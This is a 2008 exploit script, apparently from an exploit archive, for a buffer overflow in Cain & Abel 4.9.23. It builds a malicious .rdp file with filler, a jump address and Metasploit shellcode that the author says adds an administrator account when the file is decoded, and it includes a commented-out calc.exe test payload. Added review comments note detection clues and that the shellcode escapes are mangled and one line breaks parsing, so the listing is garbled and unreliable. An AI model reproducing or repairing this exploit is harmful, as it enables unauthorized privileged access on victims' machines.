# Title : Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit
# Published : 2008-12-03
# Author : Encrypt3d.M!nd
#exploit.py
# Python 2 script (print-statement syntax). It prints the author's banner,
# then writes one crafted file, cain.rdp, into the current working directory.
# The banner text below is the author's and is reproduced unchanged; the
# "Tested on" line and the stated effect are the author's claims, not
# something this listing demonstrates.
print ""
print " !R4Q!4N H4CK3R"
print "Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit"
print "By:Encrypt3d.M!nd"
print "encrypt3d.blogspot.com"
print "######################################################"
print "Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder..and all my friends"
print "This is exploit for my PoC"
print "Tested on:Windows Xp Sp3 Patched"
print "This exploit will Create File(.rdp) and when decoding"
print "The file with Cain(Remote Desktop Password Decoder)"
print "Will Add administrator user(user) with password(pass)"
print ""
# Payload provenance, per the generator banner on the next two lines: a
# Metasploit "win32_adduser" payload (USER=user, PASS=pass, EXITFUNC=seh,
# 232 bytes) run through the PexFnstenvSub encoder. For defenders, the
# observable stated by the author is a new local account named "user"
# appearing right after a .rdp file is opened with the affected tool.
# win32_adduser - PASS=pass EXITFUNC=seh USER=user Size=232
# NOTE(review): the following line is not valid Python; it appears to be the
# second line of the same generator banner with its leading '#' lost in
# transcription. As reproduced here the script therefore does not parse.
Encoder=PexFnstenvSub http://metasploit.com
# NOTE(review): the payload literals below are shown without backslash
# escapes ("x2b" is three ASCII characters in this listing), so the actual
# byte values cannot be read from it; treat these strings as a mangled
# transcription rather than as the raw payload. Fifteen concatenated
# fragments; the last one ends in a stray semicolon.
shellcode = "x2bxc9x83xe9xccxd9xeexd9x74x24xf4x5bx81x73x13x46"
shellcode+= "xcdx10x60x83xebxfcxe2xf4xbax25x54x60x46xcdx9bx25"
shellcode+= "x7ax46x6cx65x3exccxffxebx09xd5x9bx3fx66xccxfbx29"
shellcode+= "xcdxf9x9bx61xa8xfcxd0xf9xeax49xd0x14x41x0cxdax6d"
shellcode+= "x47x0fxfbx94x7dx99x34x64x33x28x9bx3fx62xccxfbx06"
shellcode+= "xcdxc1x5bxebx19xd1x11x8bxcdxd1x9bx61xadx44x4cx44"
shellcode+= "x42x0ex21xa0x22x46x50x50xc3x0dx68x6cxcdx8dx1cxeb"
shellcode+= "x36xd1xbdxebx2exc5xfbx69xcdx4dxa0x60x46xcdx9bx08"
shellcode+= "x7ax92x21x96x26x9bx99x98xc5x0dx6bx30x2ex3dx9ax64"
shellcode+= "x19xa5x88x9exccxc3x47x9fxa1xaex7dx04x68xa8x68x05"
shellcode+= "x66xe2x73x40x28xa8x64x40x33xbex75x12x66xb8x63x05"
shellcode+= "x34xedx60x01x35xbex30x4fx07x89x54x40x60xebx30x0e"
shellcode+= "x23xb9x30x0cx29xaex71x0cx21xbfx7fx15x36xedx51x04"
shellcode+= "x2bxa4x7ex09x35xb9x62x01x32xa2x62x13x66xb8x63x05"
shellcode+= "x34xedx3fx21x02x89x10x60";
# Alternative payload the author left commented out (described as launching
# calc.exe). It is inert as written and is likewise shown without escapes.
# and if you want to test it..this shellcode will open calc.exe
#shellcode = "x33xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xb2"
#shellcode+= "xabx63x3dx83xebxfcxe2xf4x4ex43x27x3dxb2xabxe8x78"
#shellcode+= "x8ex20x1fx38xcaxaax8cxb6xfdxb3xe8x62x92xaax88x74"
#shellcode+= "x39x9fxe8x3cx5cx9axa3xa4x1ex2fxa3x49xb5x6axa9x30"
#shellcode+= "xb3x69x88xc9x89xffx47x39xc7x4exe8x62x96xaax88x5b"
#shellcode+= "x39xa7x28xb6xedxb7x62xd6x39xb7xe8x3cx59x22x3fx19"
#shellcode+= "xb6x68x52xfdxd6x20x23x0dx37x6bx1bx31x39xebx6fxb6"
#shellcode+= "xc2xb7xcexb6xdaxa3x88x34x39x2bxd3x3dxb2xabxe8x55"
#shellcode+= "x8exf4x52xcbxd2xfdxeaxc5x31x6bx18x6dxdax5bxe9x39"
#shellcode+= "xedxc3xfbxc3x38xa5x34xc2x55xc8x02x51xd1x85x06x45"
#shellcode+= "xd7xabx63x3d";
# The author labels this 4-byte value as an address in user32.dll
# (0x7E492FB7, little-endian in the literal). It is written twice into the
# file directly after the filler. Like the payload, the literal has lost
# its backslash escapes in this listing.
eip = "xB7x2Fx49x7E" #user32.dll jmp esp 0x7E492FB7
# 8206 bytes of a single repeated character. Detection angle: a .rdp file
# whose first ~8 KB is one repeated byte, rather than the text settings
# lines an RDP client writes, is not a legitimate connection file.
chars = "E"*8206
print "Bu!ld!ng 3xpl0!t....Pl3453 W4!t"
print ""
# Layout of the written file: filler, the address twice, ten repetitions
# of "x90", then the payload. Written in text mode to cain.rdp in the
# current directory with no error handling; the name `file` shadows the
# Python 2 builtin of the same name.
file = open('cain.rdp','w')
file.write (chars+eip+eip+"x90"*10+shellcode)
file.close()
print "D0NE!"